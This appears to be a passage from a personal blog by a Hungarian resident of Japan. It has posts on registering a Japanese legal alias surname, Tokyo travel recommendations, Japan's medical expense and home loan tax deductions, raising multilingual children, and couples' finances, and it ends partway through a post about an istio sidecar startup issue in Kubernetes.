In Japan each family is registered in the family registry (戸籍, koseki), with everyone in the family having the same surname. The family is defined as parents and children, so when a person gets married they move from their parents’ koseki to their newly created one. This means that spouses must have the same family name after marriage (they get to choose one, usually the husband’s), and their kids will all have the same surname as well (until the kids get married or if the parents divorce). However the family registry only has entries for Japanese people (citizens), not for foreigners, so if a Japanese gets married with a foreigner they can both keep their old names.

When we got married, my wife (who is Japanese) moved from her parents’ koseki to her newly created one, and I got added as a note saying that the husband is a foreigner. At this point we had a few options for my wife’s and future kids’ family name:

My wife changes her surname to mine in katakana, so サボー. Then the kids would have the same surname.
My wife keeps her surname (木村, Kimura) and the kids get her surname.
My wife keeps her surname and after our kids are born we apply to the family court to allow the kids to move to their own koseki and get my name

Both of our family names are among the most common names in our countries, so neither of us is very attached to it. Thus the decision came down to convenience: as we intend to stay in Japan long term, our kids are better off with a Japanese family name. (I always have to repeat my name multiple times when making restaurant reservation, while my wife just says Kimura and everyone knows even the kanjis.) So my wife and our recently born baby are both 木村.

However this might present a problem for me: as all Japanese families share the same family name, some people might expect the same from us. I’m a bit worried that if I go to a hospital, school or on a trip with our kid(s), it might be an issue that we don’t share a name, and there is no easy way to prove our relationship.

To further reinforce this, when we went to the hospital for the delivery, sometimes the staff asked me to leave the room and wait in the lobby. When they wanted to call me back, they called me Kimura san (since they never asked my name, they simply used my wife’s surname which works for Japanese couples).

So how can I become sort of Kimura? I could change my name in Hungary and become legally Kimura, then update all of my documents here (which would make me Kimura and not 木村, as they would use my name as it’s written in my passport), but that feels like too big of a change (also my Japanese is very far from being native, so I feel like having a very Japanese name and using it at work, bank, hospital, etc. would lead to confusion). And that’s how I decided to register 木村 as my legal alias, which means I get to have both names and decide which one I want to use in each situation.

The process

Alias registration is done by the city one lives in. It seems like it’s not fully regulated centrally, and cities get to make up some of the rules on what they accept as a reason for doing it. I live in Mitaka, so I went to the Mitaka city hall. First they told me that the purpose of the alias is to register a name that one has been using for a while, so they asked me if that’s the case. (If I say yes, then based on online sources they likely would have asked me for proof of this, e.g. utility bills, shipping labels, business card, etc.) I said no, and explained that the reason is to have the same family name as my wife and kids. The person at the counter then went to the back to check, and came back saying that this was a good enough reason. I filled out a form, and that was it.(The form had a field for the reason and the city hall staff recommended simply writing that I want the same family name as my wife.)

They wrote my alias on my MyNumber card as 通称: 木村マーク at the place where they write your new address after moving. At next renewal it is supposed to go to the top of the card next to my real name like SZABO MARK (木村マーク).

After the city hall, I printed a 住民票 (jūminhyō) at a konbini and this has 通称 as a separate field on the right of my normal name.

Then I went to the police station to update my driving license. They gave me the standard form for address or name change, and I was told to write it as a new name like this: SZABO MARK (木村マーク). They wrote this in full at the section where address changes go, and told me that this will go to the top of the card on next renewal.

Actually there is no next steps for me on this. I could tell my company about it and ask them to change my name to 木村マーク but I’d rather keep my current name for now. I might start using it for everyday things related to my family (e.g. ordering things online, maybe hotel reservations for family trip). But what’s important is that now I have multiple government issued IDs that have the same family name as the rest of my family.

Further recommended readings

My Tokyo travel recommendations

2024-02-18T00:00:00+00:00

I often get asked by friends visiting Tokyo what they must see/eat/experience, so in this post I’ll summarize my top recommendations. This doesn’t aim to include all the cool places, but rather highlight some of the less known parts of Tokyo that I really like.

All photos were taken by me in this post.

Things to see in Tokyo

Ghibli Museum and Kichijoji

I highly recommend Ghibli Museum, if you like any of their classic movies. You need an advance ticket to enter, and tickets go on sale on the 10th of the previous month.

The museum is located in Inokashira Park, so I recommend to take a train to Kichijoji and then walk from there. After or before the museum I recommend walking around the park and also around Kichijoji station, North of the park. Kichijoji has many shops on both sides of the station, and it’s a popular weekend destination for Tokyoites (which also means it gets pretty crowded, so weekdays are better to visit).

To eat

If you get hungry, Kichijoji has many great local restaurants. Some of my favorites:

Dōkutsuya ramen
Ramen Sawada
Katsu yakitori and izakaya (only open in the night)

Kichijoji is popular on the weekends, and it might be hard to find a restaurant without reservation. If you run into this problem, try one station up or down the Chuo line: Mitaka or Nishi-Ogikubo both have many great local restaurants and they are often less crowded.

Kappa bashi shopping street

Kappa bashi is located between Ueno park and Asakusa, so I recommend visiting this together with either (or both) of those. It’s a shopping street lined up with restaurant-supply shops and kitchen-equipment dealers.

What I really like about this place is that while the shops serve tourist and regular customers, they also actively serve restaurants as well, so you can see all the things that one would need to open their own ramen shop.

Since it’s a street, Google Maps brings you to the middle. I recommend starting at the shop called Niimi and then walk North from there.

If you are in the neighborhood, you’ll likely also go to Sensō-ji, the famous temple in Asakusa (gets a bit crowded, but still a must see). Close to the main gate of the temple is the Asakusa Culture Tourist Information Center which has a great view from their top floor (all for free).

To eat

Kappa Matsuri - small local place serving okonomiyaki (hearty omelet with noodles)
Sometarō - slightly bigger place also serving okonomiyaki
Bibibi Hokkaido restaurant - bit towards Ueno, but I highly recommend this place. Their main shop is in Hokkaido (the northerns most island of Japan), and they bring most of their ingredients from there.
Hoppy street - this is in Asakusa and it’s a street with many bars with outside seating.

Ginza

Ginza is the upscale shopping district of Tokyo. The reason I like it is due to its architecture: Japanese building rules are pretty lax (it’s mostly about not blocking sun), so brands often go pretty crazy with their design.

My secret spot in the area is the rooftop garden of the GINZA SIX department store. The mall itself is also really stylish (and have a huge bookstore):

Once you make your way up to the top, you’ll find a nice garden hidden in the middle of the city:

Shin-Okubo and Koreatown

Shin-Okubo is a train station on the Yamanote and the neighborhood is known as Tokyo’s Koreatown.

It is a neighborhood of shops and restaurants, so the main thing is to walk around, shop and eat. I really like the Korean fried chicken: they have a lot of options for flavors and you can get melted cheese to dip it into.

To eat

Byuljan is where the above photo was taken. It’s a stylish restaurant/bar
Hotel Cen has a low-rise rooftop cafe if you need a break from the bustling city
Trdlo I haven’t been to this place, but this is a cafe that sells Korean chimney cake (similar to Hungarian Kürtőskalács) and has good reviews

Day-trips

If you get tired of Tokyo or want a change of scenery, there are many great day trip options. Here are some of my favorites.

Mt. Takao

Mt. Takao is likely the most accessible mountain near Tokyo (50 minutes from Shinjuku). Don’t expect a big hike (after all it’s only 599 m tall), and you won’t need any hiking gear, but there are a few trails and attractions so it can be a great time spent in nature. See Live Japan and Japan Guide for more info.

After the hike I highly recommend the hot spring bath close to the station. Just keep in mind that as with other public baths in Japan, you need to be fully naked (there are separate men and women sections). If you forgot to bring your towel, they offer rental of those (but you might want to bring a change of clothes, so that you don’t have to put back your dirty clothes after the bath). The hot spring also has a restaurant which can be a great way to end the day after the bath.

Yokohama

Yokohama is arguably the most interesting city in Tokyo’s suburbs. Most of the fun stuff is in the Minatomirai neighborhood near the main Yokohama station.

If you are interested in old and new cars, I recommend the first floor of Nissan Motor Global Headquarters where you can see many of them. If you want to see other engineering marvels, the Mitsubishi Industrial Museum is great (turns out Mitsubishi makes everything from spaceships to deep sea submarines).

Cup Noodles also have a museum here, and there is even a ferries wheel.

Yokohama is also home to Japan’s largest Chinatown, which you’ll find a bit further to the South (although I haven’t been here yet). Nearby you can also see a life-size moving Gundam robot (also on my to-see-list, but haven’t got there yet).

Kamakura

Further to the South is Kamakura, a costal city famous for its Great Buddha statue.

There is another Buddhist temple nearby that dates back to the 8th century and has a nice garden. Near this temple there is Kannon Cafe, a modern, stylish place that I recommend (it’s just a cafe, so don’t go out of your way for it, but it’s a nice place if you are nearby).

Kamakura being a costal town also has a sandy beach, and further down the coast there is a modern lighthouse.

Kawagoe

North of Tokyo is Kawagoe, an old castle town with many of its buildings dating back to the Edo period (1603-1868).

The main attractions are along the shopping street including the Kawagoe Matsuri Museum which is about the local festival held in October (if you happen to be here that time, you can also see the festival, but be prepared to the crowds).

Medical expense tax deduction in Japan (医療費控除)

2024-02-03T00:00:00+00:00

In Japan if one pays more than 100,000 yen of medical expenses in a calendar year, they can deduct it from their pre-tax income (usually leading to an income tax refund). In this post I’ll attempt to summarize the rules of this.

As with all my posts, this is not tax advice and do your own research before making any decision. Also if you find any inaccuracy or mistake, please leave a comment at the end, so that I can correct it.

Who’s expenses

Your and any relative’s that lives with you if you paid for their medical expense.

その年の1月1日から12月31日までの間に自己または自己と生計を一にする配偶者やその他の親族のために医療費を支払った場合において、その支払った医療費が一定額を超えるときは、その医療費の額を基に計算される金額（下記「医療費控除の対象となる金額」参照））の所得控除を受けることができます。これを医療費控除といいます。

If you or your spouse, who shares a household with you, pay medical expenses for yourself or other relatives during the period from January 1 to December 31 of the year, and the paid medical expenses exceed a certain amount, you can receive an income deduction based on the amount of those medical expenses (see below for the amount eligible for the medical expense deduction). This is called a medical expense deduction.

Source, translated with ChatGPT.

You can deduct your spouse’s expense even if they are not your dependent, assuming you paid for it (source). Even the medical expenses of your sister’s child can be deducted, if you live together and you paid for it (source).

The amount

The amount one can deduct is calculated by:

(incurred medical expenses) - (any compensation, insurance payout, etc.) - 100,000 yen

with a maximum of 2 million yen.

医療費控除の金額は、次の式で計算した金額（最高で200万円）です。

（実際に支払った医療費の合計額-（1）の金額）-（2）の金額

（1）保険金などで補てんされる金額

（例）生命保険契約などで支給される入院費給付金や健康保険などで支給される高額療養費・家族療養費・出産育児一時金など

（注）保険金などで補てんされる金額は、その給付の目的となった医療費の金額を限度として差し引きますので、引ききれない金額が生じた場合であっても他の医療費からは差し引きません。

（2）10万円

（注）その年の総所得金額等が200万円未満の人は、総所得金額等の5パーセントの金額

The amount of the medical expense deduction is calculated using the following formula (up to a maximum of 2 million yen):

(Total amount of actual medical expenses paid - Amount (1)) - Amount (2)

(1) Amount compensated by insurance, etc.

(Example) Such as hospitalization benefits paid under life insurance contracts, or high-cost medical care, family medical care, and lump-sum childbirth and childcare benefits paid by health insurance.

(Note) The amount compensated by insurance, etc., is deducted up to the amount of medical expenses that were the purpose of the benefit. Therefore, even if there is an amount that cannot be fully deducted, it will not be deducted from other medical expenses.

(2) 100,000 yen

(Note) For people whose total annual income, etc., is less than 2 million yen, the amount is 5 percent of the total annual income, etc.

Source

This also means that medical deduction can only be used if the medical expenses are over 100,000 yen.

Which expenses are included

In principle (quotes are translations of this page):

Medical treatment by a doctor or dentist (it has to solve a problem. Check-ups and preventative care is excluded. Vaccines are also excluded, unless in special cases)

Compensation for medical treatment or therapy by a physician or dentist (however, expenses for medical examinations and honoraria to physicians, etc. are generally not included).
Medicine necessary for treatment

Consideration for the purchase of medicines necessary for medical treatment or recuperation (the purchase of medicines such as cold remedies for a cold is considered a medical expense, but the purchase of medicines used for disease prevention or health promotion, such as vitamins, is not considered a medical expense).
Necessary hospital stays

3 Compensation for the provision of personal services to be admitted to a hospital, clinic, long-term care health facility for the elderly, long-term care medical care hospital, designated long-term care medical facility for the elderly, designated long-term care welfare facility for the elderly, designated community-based long-term care welfare facility for the elderly, or midwifery home
Traditional Chinese medicine and other alternative medical treatments, if they are to treat a medical issue

4 Compensation for treatment by anma, massage, shiatsu, acupuncture, moxibustion, and judo therapy therapists (however, this does not include treatment that is not directly related to treatment such as relieving fatigue or improving physical condition).
Travel expenses to the hospital (with some exceptions) - generally only public transport costs (train, bus) are included, or taxi if public transport is not available. Expenses related to going by private car (parking, fuel) is not included

(1) Expenses for hospital visits to receive medical treatment by doctors, etc., transportation to and from doctors, etc., expenses for room and board during hospitalization, and expenses for the purchase or rental of medical equipment such as corsets, which are usually necessary.

(Note 1) Taxi expenses are not included in the deductible expenses unless public transportation such as trains and buses are not available.

(Note 2) Gasoline and parking fees for hospital visits by private car are not included in the deductible expenses.

There is a significant overlap between what health insurance covers in Japan (generally: treatment for a medical issue) and what can be included here, however there are additional expenses that are included in the tax deduction but not covered by insurance (e.g. pregancy-related costs, travel to hospital).

NTA has a long FAQ on their site and I’ll list some of them that I found interesting:

Medical check-ups are excluded unless they find a serious disease and directly lead to a treatment
Massage is included, but only if it’s for treatment of a medical condition
Medically not necessary cosmetic surgeries and dental procedures are not included, e.g. birthmark removal and cosmetic teeth straightening
However dental treatment even when using gold or porcelain is included, even though these are not covered by insurance (insurance only covers the basic materials), as long as the price is inline with general procedures
Another thing that’s not covered by insurance, but included in this is the cost of regular check-ups of pregnant women
- Infertility treatment and the cost of artificial insemination is also included
- Cost of abortion is also included
- Checking for Down-syndrome by looking at the baby’s DNA found in the mom’s blood (NIPT) is not included, as it is considered a check-up that doesn’t lead to treatment
- Attending a course on breathing techniques to reduce the pain of labor is also excluded
Daily purchases following a doctor’s advice are mostly excluded:
Gifts for doctors and nurses are also excluded
Cost of travel to the hospital by public transport is included, but not if you go by your own car.
- Cost of taxi can be included, if taxi was necessary.
- However cost to travel to one’s hometown before childbirth (common practice to give birth close to one’s parents so that they can help with the newborn) is excluded
If you pay in installments, only the amount paid in the year should be counted (the rest should be counted in the year it was paid, even if the medical procedure was done in an earlier year)
One needs to deduct any insurance payment or other compensations from the medical costs when calculating the amount
- Even if the husband paid for the childbirth expenses of his wife, and the wife’s insurance paid her back, the husband has to deduct this from the amount in his calculations
- However maternity allowance (money from the mother’s employer) does not need to be counted as it’s not insurance money

How to file for the deduction

One needs to file final tax return (確定申告) to claim medical expense deductions (source).

Documents to submit

From here, translated with ChatGPT:

Create a “Medical Expense Deduction Detailed Statement (PDF/1,024KB)” or “Self-Medication Tax System Detailed Statement (PDF/611KB)” from the medical expense receipt (Note 1), and attach it to your tax return.

If you have received a medical expense notification (Note 2) from your health insurance provider, attaching this notification can simplify the details required for the medical expense deduction.

Please note that to verify the details of the medical expense deduction, you may be asked to present or submit medical expense receipts (excluding those with a medical expense notification attached) until five years after the tax return deadline.

For proof on expenses that were included in the insurance, one can use the medical expense notification from your insurance provider, and then don’t need to keep the receipts for these expenses.

One can also link their MyNa Portal with e-Tax and import the medical expenses covered by insurance (source):

マイナポータル連携を利用すると、医療費控除に使用できる医療費通知情報をマイナポータル経由で取得し、所得税の確定申告書を作成する際に、該当項目に自動入力することができます。

If you are using this system and want to include a relative’s expenses, they need to configure you as a proxy (same info on NTA’s page).

NTA also provides a spreadsheet called Medical Expenses Summary Form (医療費集計フォーム) that one can use to collect their expenses and import it directly into e-Tax. (source, spreadsheet download)

Details on how to file when using e-Tax or filing on paper can be found on this page.

Home loan tax deductions in Japan (as of 2024)

2024-01-28T00:00:00+00:00

Japan has a system that provides income tax deduction for people with a home mortgage in the first years of the mortgage (住宅ローン減税). The rules have changed in the past, and which rules apply depends on when one bought/built their home. In this post I’ll attempt to summarize the rules applicable to a home acquired in 2024. As with all my posts, this is not tax advice and do your own research before making any decision. Also if you find any inaccuracy or mistake, please leave a comment at the end, so that I can correct it.

Overview

One with an eligible mortgage on an eligible home can deduct a percentage of the outstanding loan principal from their income tax. There are multiple limits (maximum income, maximum amount of deduction) and also this can only be done during the first years of the mortgage.

Amount

0.7% of the outstanding principal (used to be 1% before the change in 2020). Source.

Length

13 years for newly built homes and 10 years for existing (used to be 10 years for newly built). Source

Eligible home

There are various requirements that a home has to fulfill to be eligible for this. The major ones are:

you have to live there
you have to move in within 6 months of the home being ready
it has to be at least 50 square meters
housing loan is for 10 years or more
you have to have bought it (so no gifting or buying it from a relative)

Full list is here, but you should definitely check with your builder about this.

Please note that there is also an income limit, discussed later in this post.

Maximum deduction amount

There is a maximum amount one can deduct (expressed in the maximum of the outstanding principal), and this depends on the quality of the house (whether it meets energy-saving and long-term housing certifications). The limits in 2024 go from 0 to 45 million yen (4,500万円).

Full list from here:

You could look into what each category entails, however it mostly comes down to what your house builder can do. We have talked with a smaller house builder company that said that they don’t have the expertise to apply for any of these certifications, so while (according to them) their quality and insulation is great, you won’t be able to take advantage of this. Meanwhile we found that big house makers handle it easily (often included in their base price), however certain certifications can come with additional restrictions. (Not directly related, but we were told that if we want to apply for the Tokyo Zero Emission House subsidy, all lights have to be low energy, so we can’t use any light we already have, as the maker has to provide information on all lights and they can’t (or don’t want to) deal with our existing lights.)

If the outstanding principal is over the limit, you can still receive deduction but only up to the limit (source).

So overall if the home meets the strictest standards and the outstanding principal is over 45 million yen, then one can get 45,000,000 * 0.7% = 315,000 yen back per year.

Income limit

The income has to be under 20 million yen in a year to take advantage of this deduction, however this is not the full gross income (source):

ロ　この特別控除を受ける年分の合計所得金額が、2,000万円以下であること。

The important thing is that this is not 年収 (total gross income) but 所得 (gross income minus necessary expenses). For salaried employees, the only expense that counts here is the salary income deduction (給与所得控除). (Source).

The salary income deduction (給与所得控除) at this income level is 1,950,000 yen (Source), so in effect for salaried employees the gross income limit is 21,950,000 yen.

Income changes around the limit

What if income goes over the limit, then goes under it the next year? You are eligible in the years when your income is under the limit.

この特別控除を受ける年分の合計所得金額が、2,000万円以下であること。

(Source). The income has to be under the limit in the year when the deduction is taken.

なお、所得2000万円の判断は毎年行います。例えば、前年は年収が2200万円で住宅ローン控除を受けられなかった場合であっても、当年の年収が2195万円以下であれば、当年では適用可能です。 The determination of 20 million yen of income will be made every year. For example, even if the previous year’s annual income was 22 million yen and the mortgage deduction was not available, if the current year’s annual income is less than 21.95 million yen, it can be applied in the current year.

Source

Why I decided to speak my language, Hungarian to our kids and raise them multilingual

2024-01-04T00:00:00+00:00

We are expecting our first child very soon, so we have been thinking and discussing which language we want to speak to them. In this post I’ll go through some of the things we considered and how we arrived to a conclusion.

Circumstances

My wife is Japanese, speaks English fluently, and recently started learning Hungarian. I’m Hungarian, speak English, and have been learning Japanese for 4 years now (probably around N3 level now, so I can handle most everyday conversation, but can’t work in Japanese yet). When we are together, we speak 80-90% in English, rest is Japanese. I communicate with my wife’s family almost entirely in Japanese. Most people in my family speak some level of English, so that’s what my wife uses to talk to them.

We currently live in Japan, and intend to stay here for the forseeable future. Even if we would move to another country, it likely wouldn’t be Hungary due to the political and economic outlook of the country, so it would likely only increase the number of languages further.

The Hungarian language

The Hungarian language is almost exclusively only spoken by Hungarians in Hungary and neighboring countries (many of them have a Hungarian minority). This includes overall 17 million speakers worldwide with 9.6 million of them living in Hungary.

The language is an Uralic language (and the most spoken one at that), which means that it is not similar to any other European language (the closest one is Finnish, however speakers of the two languages can’t understand each other anymore). This is important especially in comparison to other European languages, where knowing one language makes it easy to learn similar languages (e.g. Italian and French, or Czech and Slovakian, or Swedish and Norwegian). Hungarian doesn’t provide any benefit like this, so its utility is mainly limited to communicating with Hungarians.

Options

I’ve talked with many friends and colleges in similar situations about their choice of language to speak to their kids, and found 3 general options. (These examples consider a non-English-native foreign father and Japanese mother):

1. Monolingual Japanese

Both parents speak Japanese to the kids. This helps the non-Japanese parent practice the language and keeps the communication simple and similar to fully Japanese families, but the family looses out entirely on the benefits of being bilingual.

2. Japanese and English

Mom speaks Japanese to the kids, dad speaks English to the kids, parents communicate in English. This is similar to how many families with a native English speaker parent raise their kids. The main benefit of this approach is that kids will know English almost natively, which is a super valuable skill.

3. Japanese, non-English foreign language, and English

Mom speaks Japanese to the kids, dad speaks his language to the kids, parents communicate in English. The main benefit of this is that the kids will have a chance of learning the father’s language, which will help them connect with that side of the family, feel closer to the culture and that side of their identity. The downside is mostly that their English won’t be as good as #2 and that the non-English language might have lower objective benefits than English. Also the family will need to put in more effort compared to #2 (e.g. having an English speaking tutor to help kids learn to read/write in English is much easier than doing it in a not so common language).

Schooling options

Learning a language as a kid is a big part about exposure to that language. Once kids start going to nursery, kindergarten and school, they will spend a big part of their waking hours there (and even the rest will be partially taken up by homeworks or hanging out with friends made at school increasing further the use of the school’s language), so the language spoken at school will have a huge impact on the language development of the child.

As for regular nursery, kindergarten or school, there seem to be two main options in Japan:

Japanese-speaking ones, some public, some private, but even the private ones are pretty affordable for most middle class households
International schools holding some or most activities in English. These are usually pretty expensive (between 1-3 million yen per year). While schools might exist for some other popular foreign languages (e.g. the French lycée français international de Tokyo), there is no full-time Hungarian school in Japan.

Then there are the after-school activities.

Some of these are similar to regular schools (a teacher teaching a group of students), and they might allow students to get into a higher level group based on their language skills.
Some are more like daycare with the staff speaking English. These might be less useful, as kids can end up speaking mostly Japanese to each other.
There is also the possibility for private tutoring or foreign speaker babysitter

Our decision

We decided that my wife will speak Japanese to our kids, and I will speak Hungarian. We will continue to communicate in English, but focus on teaching the kids Japanese and Hungarian primarily. We haven’t fully decided on international vs Japanese-speaking schools, as we have options for both around where we live, and while we could likely afford international school for at least some of our kids (at a time), it would still be a major expense that we want to consider carefully.

The reasons for teaching our kids Hungarian comes down to culture, identity and communication with family. Hungary shares lot of its culture with the neighboring countries (including food, festivals, history), so the main thing that sets a Hungarian apart from e.g. a Slovakian or a Croatian is the language. Our kids will be Hungarian and Japanese, so to be able to fully have the Hungarian identity, having some knowledge of the language seems paramount.

Also I really enjoy Hungarian humor (especially the author, Jenő Rejtő. It’s a bit similar to French humor like Tais-toi!), however it just doesn’t really translate, so being able to share that with my kids is really important for me.

I do recognize that teaching and maintaining Hungarian with our kids is going to be a challenge, so based on books and articles that I read, I prepared a list of strategies to help with it:

At home we will follow the one-parent-one-language method, I will only speak Hungarian to the kids, and my wife will mostly speak Japanese (it is less strict for her, as kids will get exposed to Japanese outside of home anyway). I will stick to this even if the kids speak to me in a different language, or if they mix the languages (which seem to happen often early on). When we are outside or with friends, we might speak another language though.
I will read children books in Hungarian, listen to songs in Hungarian, watch cartoons and movies in Hungarian with the kids.
We plan to stay in Hungary for a month each summer. This is not only to let the kids practice Hungarian, but also to let them connect with that side of the family and their cultural heritage. (Both my wife and I work remotely, so we can partially work during this one month.) Also as the kids get older we plan to leave them with my family, while we have some couple time and travel around Europe.

We recognize that as the kids get older and they have more strict school attendance and extracurricular activities (e.g. sport trainings, which often continue during summer break), these stays might get shorter, and we will adjust them as needed.
There is also the Hungarian School of Tokyo, which is a Saturday morning school twice a month for kids aged 1-15 in the Hungarian Cultural Institute in Minato-ku. We intend to join this from early on.
We are also considering a Hungarian baby-sitter or au-pair, but the formers are hard to come by in Tokyo, and we don’t have enough space in our home for the latter. But these are also options that we might consider again later.

Goal

Some books recommend setting a bilingual goal for your children, usually from the list of

understanding the language
speaking the language
reading in the language
writing in the language

It is generally believed that this order is increasingly more difficult and later stages encompass earlier ones (e.g. if you can write, you can also read and speak a language). Most books also recommend adjusting your goals as necessary (e.g. if you can’t travel to your country as often as planned, you might need to aim lower).

I feel that if the kids can have a conversation with their Hungarian family in Hungarian, enjoy movies in Hungarian (for all that comedy), that would make me very happy. Still I don’t want to set a strict goal, as I don’t want the language learning to be burden for the kids. So I’ll do my best initially, and then work from there with the children themselves.

Books

I read a few books on raising bilingual kids, and my favorite one was The Bilingual Family by Edith Harding-Esch, Philip Riley. This book goes through the academic literature on the topic, debunks common myths and generally provides a well-rounded overview of research in the area. Then it describes the stories of multiple families raising bilingual kids. The book is very European-centric (the authors both live there, as well as most families appearing in the book), which I personally prefer over some of the other, more US-focused books.

Thoughts on handling money in a relationship

2023-12-26T00:00:00+00:00

One of the common causes of divorce is money problems, so it’s important to be mindful about it. Here are my thoughts on one possible way of doing it.

This post contains discussion of tax, but is not tax advice. Do your own research.

I’m considering 3 distinct phases of the relationship: dating, moving in together, and marriage.

Stage 1: dating

This is the first stage of the relationship, when the couple started dating but they don’t yet live together. Major shared expenses are likely taking trips together and going the restaurants. At this stage, the main goal should be to learn whether the two people are compatible, which includes how they both approach money. So I wouldn’t focus too much on how the couple splits the common expenses, but rather how this makes both of them feel and how they handle when there is a disagreement.

This also goes for how each party spends money on their own. Couples at this point often go shopping together and it’s a great opportunity to learn how the other person spends their money, what their priorities are, how they feel about the purchase later, etc.

Discussion about money at this point might be focused on shared expenses (e.g. what’s the budget for a trip; let me pay for dinner this time; I’m tired, let’s take a taxi, I’ll pay for it), or to learn about the other person’s way of spending (e.g. you asked me about what phone should you get, so what’s your budget and what’s important to you; so you said you need a new winter coat, do you want to go shopping together? Do you have a brand or budget in mind?).

Stage 2: moving in together

If the relationship is going well, the next big step is moving in together. Money becomes more serious now.

Before moving in together, the couple should sit down and discuss their expected shared expenses. This exercise has two steps:

What is considered a shared expense
How to fund the shared expenses

1. What is considered a shared expense

This will include things like:

rent (or contribution to the mortgage and/or maintenance if one of them owns a home)
utilities
groceries (food, cleaning supplies, toilet paper, etc.)
fun together (restaurants, trips, etc.)

The line between personal and shared expense will at times be a bit blurry. E.g. hand soap is definitely a shared expense, but how about body soap and shampoo that only one person uses?

It is never going to be perfect split (e.g. if I eat twice as much, should I contribute more?), and I think the goal is again to learn about how the other person treats money and whether the couple is compatible.

With my partner at this point we included a 20% rule into our calculation: if you are shopping for mostly common stuff, it is fine to include things for yourself up to 20% of the overall amount, and still consider it a shared expense. But we never actually calculate this, it’s more like a rule of thumb and in practice we go by feeling (e.g. I don’t think twice about adding a canned coffee for myself when I go shopping and pay for it all from the shared account, but I will split the bill if I buy a nice bottle of wine that I’ll drink with my friends without my partner).

Once you know what you two want to include in the shared expenses, make an estimate for each category and come up with an overall number. You don’t have to get this perfect first, and actually revisiting this estimate every few months is a great way to keep the discussion about money going.

2. How to fund the shared expenses

If the couple makes about the same amount, then splitting half and half is a pretty straightforward solution. If one of them makes significantly more, then I think the more fair split is in proportion to their take-home incomes, e.g. if one makes 4X money and the other makes 6X, then splitting the costs 40-60%, if one makes twice as much, then splitting 33-67% and so on.

Regardless of this split, the shared money should be treated as owned equally (so the person contributing more should not have a bigger say in deciding what to spend it on). Any decision about the spending of this should be made together, and either party should be able to raise concerns and discuss issues. If this leads to issues, I’d highly recommend to resolve those fully before moving to the next stage as income difference will likely only get worse (e.g. if one takes paternity leave after having kids), and it is a common source of marital conflict.

Get a shared account (or something like that)

To facilitate using this shared pile of money, I recommend having a shared bank account or shared balance that both people have a debit card for. In Japan shared accounts are not a thing (not even for married couples), but one can get a pre-paid VISA debit card that’s connected to a shared balance. This specific solution has another benefit: moving money between the shared balance and the personal balance is free and only a few taps in the app, so if a shop doesn’t take credit cards, then one can pay in cash and take the money out of the shared balance. This also works well for splitting expenses (e.g. I can pay for the whole cart with the shared balance, then put back the money for that expensive wine). Also adding the card to PayPay helps with shops that only take that.

Having it in an account has the other benefit that both parties can see where the money is going and it’s easy to look back to past expenses too.

Having the shared balance also helps push the couple to have regular discussions about money. There will be months when the money runs out early, and there will be months when there will be leftover. And there will definitely be exceptions to the “what’s included” that the couple didn’t consider before. This stage of the relationship should still be about learning about each other and setting a healthy foundation for the relationship, so having regular discussions about money will definitely be helpful.

At this stage it’s still “my money” and “your money”, and we just split the shared expenses.

Stage 3: getting married

The next stage of the relationship might be marriage. For some couples, they might decide to continue the system set up in the previous stage, and that’s totally fine, others might open a single shared account and pool all of their money together there. Personally I’m closer to the second option on this.

Pre-nup

Before getting married, I highly recommend couples to sign a pre-nup. For people in Japan, this site has a great template (Internet Archive). The thing that I really like with this specific template is that it lists out most of the default rules and laws about what’s considered marital property and how it would be split in case of a divorce. Most couples getting married don’t look into it, so having it all summarized is a good start for discussion (sort of: this is the default, what do we want to change).

I personally think that the Japanese rules are pretty fair: wealth obtained prior to the marriage and money received (gift, inheritance) is separate property, and only money made during the marriage (salary, bonus) is split half-half during a divorce. Thus the only thing I asked to add was about child custody, as Japan doesn’t have shared custody leading to child abduction cases where one parent can loose all contact to their kids.

Investments during the marriage

A marriage can end in two ways: one (or both) party dying or divorce, and most people aim for the first option (preferably after a long and happy life). In case of divorce, money will be split according to the pre-nup and applicable laws, while in case of death inheritance tax might take effect.

My hot take: investments made during the marriage should be split equally between the couple. (E.g. if the couple wants to invest 200,000 yen in a month, each of them should invest 100,000 yen of it.)

If the marriage ends with someone passing, the inherited amount will be lower leading to a lower inheritance tax (which is progressive), and if the marriage ends with divorce, everyone can just keep their own investments. If you are the higher earner, and worried about doing this and then divorcing, you can also think of this as giving your spouse the money when you still fully love them, rather than being forced to give them money during a divorce.

Moreover this can also help the couple invest more in tax-preferential investment options like NISA and iDeCo/DC (if one spouse wouldn’t be able to max it out on their own).

Be aware of gift tax

This is where Japan doesn’t make life easy, as gift tax is levied on any person who receives more than 1.1 million yen in a calendar year and this applies to gifts between married couples as well. However money given to a family member for daily living expenses (or educational expenses like university tuition) is not considered a gift, which can lead to very similar situations resulting in different tax implications.

For example let’s consider a family with the wife only working part time, making 100,000 yen a month. At the end of the month the couple has 200,000 yen left that they want to invest, 100,000 yen each.

Scenario 1: the wife spends her income on herself, the kids, or everyday items. The husband sends her 100,000 yen which then she moves to her investment account and invests. My understanding is that in this case the transfer would count as gift and would incur gift tax liability if it exceeds the yearly tax-free limit.
Scenario 2: the wife invest her income entirely. The husband gives her money for daily living expenses including personal purchases. My understanding that this would not be considered a gift, and thus no gift tax would need to be paid.

Summary

Mentally I prefer to consider the finances of the entire family as a single unit: there is money coming in (our salaries) and money going out (shared expenses, personal expenses, investments), e.g.

One spouse makes X
Other spouse makes Y
The shared expenses are S
Each spouse keeps P for personal expenses (this can be different per spouse, or the same)
X + Y - S - P*2 gives how much the family saves per months. Divide this by two to get the amount each spouse should invest

How to make this work in Japan

As Japan doesn’t allow shared bank accounts and enforces gift tax between family members, I think the following strategy is the best to implement the above logic:

each spouse starts by investing their target amount from their incomes, then
each spouse takes out their personal expenses from their income (even if some of this would come from the other spouse, it would be for living expenses and thus likely not incur a gift tax. However using the other spouse’s money for items that have a resale value, e.g. jewelry, might be seen as a gift, so better to use each spouse’s own money.)
Pool the rest of the money together to pay for shared expenses (this is a big difference from the living together stage of splitting the shared expenses based on the income ratios)

None of this is not tax advice though, and do your own research before you make any decision.

Transient network issue at container start when using istio (solution: holdApplicationUntilProxyStarts)

2023-11-26T00:00:00+00:00

I was setting up an app on a kubernetes cluster that had istio configured as a service mesh, and I run into an issue: as the application starts, it attempts to communicate to another service over the network (doesn’t matter if it’s an external service or something running on the same cluster), and it fails. However when I kubectl exec into the container, I can successfully reach the same service. What’s going on and how to solve it?

The issue comes from how istio sidecars work. Istio injects an initContainer and a regular container to each Pod. The former obtains the certificate, and the latter intercepts network calls from the application container(s), wraps them in mTLS and send them to the destination’s sidecar.

initContainers start in the order defined in the yaml, and one has to finish before the next can start. Regular containers on the other hand start in paralell, all at the same time.

